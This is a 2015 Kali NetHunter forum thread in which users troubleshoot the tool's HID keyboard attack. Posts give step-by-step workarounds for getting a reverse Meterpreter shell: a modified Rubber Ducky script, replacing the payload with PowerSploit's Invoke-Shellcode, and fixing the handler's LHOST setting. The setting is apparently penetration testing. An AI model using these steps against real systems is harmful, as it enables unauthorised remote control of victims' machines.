Results 1 to 12 of 12

Thread: HID Keyboard attack produces strange error in other kali machine

  1. #1
    Join Date
    2015-Apr
    Posts
    1

    HID Keyboard attack produces strange error in other kali machine

    After I updated my Kali Nethunter (Expecting bugs) I decided to test out HID Keyboard and it produces this error on my other machine.
    Started HTTPS reverse handler on https://0.0.0.0:4444/
    Starting the payload handler...
    192.168.1.11:57054 Request received for /INITM
    Unknown Request to /INITM and something about firefox. Anyone else experiencing these errors?

  2. #2
    Join Date
    2015-Jul
    Posts
    7
    I'm having the same issue, Nexus 7 2013. I'm attempting to run the handler on the tablet as well. Running the HID attack causes powershell to crash after everything is input.
    Attached Images Attached Images
    Last edited by Swacky12; 2015-07-11 at 05:09. Reason: Resolution of bug image was poor

  3. #3
    you have found a bug yet
    May be because someone hacked your already

  4. #4
    Join Date
    2015-Jul
    Posts
    7
    Well I've tried it on 3 different test boxes which should have had no exposure before and gotten the same error. Different ports etc.

  5. #5
    Join Date
    2015-Jul
    Posts
    7
    I've now bypassed the issue using a modified ducky script as my nethunter HID attack to gain a shell. I suspect this issue can be fixed by using an older source shell. Will try modifying the source to the successfully tested shell and will report back.

  6. #6
    Join Date
    2015-Jul
    Posts
    4
    Hey guys,

    I am having the same issue .... anyone found a solution for this ?

  7. #7
    Join Date
    2015-Jul
    Posts
    7
    Stoof, I can't tell you how to fix it, but I can tell you how implemented the workaround to do virtually the same thing as the stock hid attack. Using the Rubber Ducky HID scripting that is also part of Nethunter you can use:

    https://forums.hak5.org/index.php?/t...oull-ever-get/

    It takes some small setup however as someone else has pointed out on the forums the key sets are out of date, most notably not entering certain characters like underscore which screws up the injection.

    Keeping that in mind here are the steps to follow:

    -Open up the HID Ducky Script Attacks in the Nethunter App
    -Set your language to "British English" in the drop down menu in the upper right
    -Copy over and implement the Ducky Script in the above link, placing your own IP and ports etc in the applicable spaces BUT there are a few items that must be changed.
    **Change all instances of quotation marks to the @ sign and visa versa
    **Change the bit.ly link to your preferred meterpreter shell code or make a tinyurl of https://raw.githubusercontent.com/ma...-Shellcode.ps1

    Not changing the bit.ly link will cause you to run a program saying you are silly to trust something ready to go from the internet without checking first.

    After you've done that you should be able to use the attack, set up your handler to handle reverse_https and you should be good to go. In all likelihood the script can probably be changed so as not to make a file and successively run it but to run it immediately but I am somewhat short on time to alter that.

    Should it be desired I can post the ready to go ducky code of the attack or go into more detail. I'm still seeing if I can make a fix for the main HID attack but this is the workaround I've come up with in the meantime that does the same basic thing.

    Cheers,
    Swacky

  8. #8
    Join Date
    2015-Jul
    Posts
    4
    Hi Swacky,

    Thanks for you reply.
    In the meanwhile I found a solution to fix the keyboard HID attack, well ... sort off.... Now the powershell does not crash anymore, and a meterpreter shell is spawned, however it closes after approx 10 seconds with the message : "Meterpreter session 1 is not valid and will be closed"
    What I did was replace the payload script in nethunter, which is in fact the powersploit invoke-shellcode.ps1 script.
    steps taken :

    1. Open nethunter on the nexus and go to kali launcher
    2. Choose option Launch Kali in Terminal
    3. Browse to the apache folder "cd /var/www"
    4. Edit the invoke-shellcode script "nano payload"
    5. copy the last line in the file which says "Invoke-Shellcode -Payload windows/meterpreter/reverse_http........."
    6. Download the latest version of the invoke-shellcode.ps1 script here : "https://github.com/mattifestation/PowerSploit/tree/master/CodeExecution/Invoke--Shellcode.ps1"
    7. Edit the downloaded script file and paste the line you copied from the payload file at the end of the downloaded script file and save it.
    8. Make sure you put the downloaded script file in the /var/www folder , rename the original payload to payload.orig "mv payload payload.orig" and rename the newly downloaded one to payload "mv Invoke--Shellcode.ps1 payload"
    9. Make sure the file permissions are set correctly "chmod --reference payload.orig payload"

    When you run the HID attack script now like you would normally do, you will see that it works.... but the meterpreter session will die after xx seconds with the message Meterpreter session x is not valid and will be closed....

    The box where I run my listener on is a raspberry pi running metasploit v4.11.4-2015071402 ... maybe that is the problem ...I did not had the chance to test it with a different Kali installation yet.
    So one step closer, but not quite there yet....

    stoof

  9. #9
    Join Date
    2015-Jul
    Posts
    7
    Ah I did have that problem briefly as well, and it was solved by an offhand tweet by one of the creators of metasploit that I found while googling the error myself. To paraphrase the problem is that the handler is giving a bad LHOST IP. Perhaps something like 192.168.0.3/24? The /24 part is entirely unnecessary and creates that error when I use that as the LHOST on the reverse handler.

    The relevant post was: https://twitter.com/hdmoore/status/598142217031688193

    Hope that helps

  10. #10
    Join Date
    2015-Jul
    Posts
    4
    You are right Swacky12, it was an LHOST IP problem on the handler side, even if you have portforwarding enabled you should still enter the external WAN IP as LHOST. Got it sorted now .
    So I have the USB HID attack fully working, and I can use the ducky script as backup, both are working fine :-)

  11. #11
    Join Date
    2015-Jul
    Posts
    7
    Awesome, and thanks to you we have an easy guide to the stock fix. I don't suppose you can make a pull request on the Nethunter github for the fix for future versions?

  12. #12
    Join Date
    2015-Jul
    Posts
    4
    Pull request created for this fix ;-)
    https://github.com/offensive-securit...unter/pull/229
    Last edited by stoof; 2015-07-31 at 15:26.

Similar Threads

  1. HID Keyboard Attack development
    By beloadjoker in forum NetHunter Development
    Replies: 60
    Last Post: 2015-11-18, 15:27
  2. Takes quite long to obtain HID driver on target machine for HID attack
    By simonpunk2016 in forum NetHunter General Questions
    Replies: 1
    Last Post: 2015-06-04, 19:56
  3. Found an error in HID Keyboard attack
    By carminesn in forum Installing NetHunter
    Replies: 1
    Last Post: 2015-02-12, 09:47
  4. Found an error in HID Keyboard attack (Apache Server)
    By carminesn in forum NetHunter Development
    Replies: 1
    Last Post: 2015-02-12, 08:53
  5. HID Keyboard Attack
    By beloadjoker in forum NetHunter General Questions
    Replies: 3
    Last Post: 2014-09-27, 22:45

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •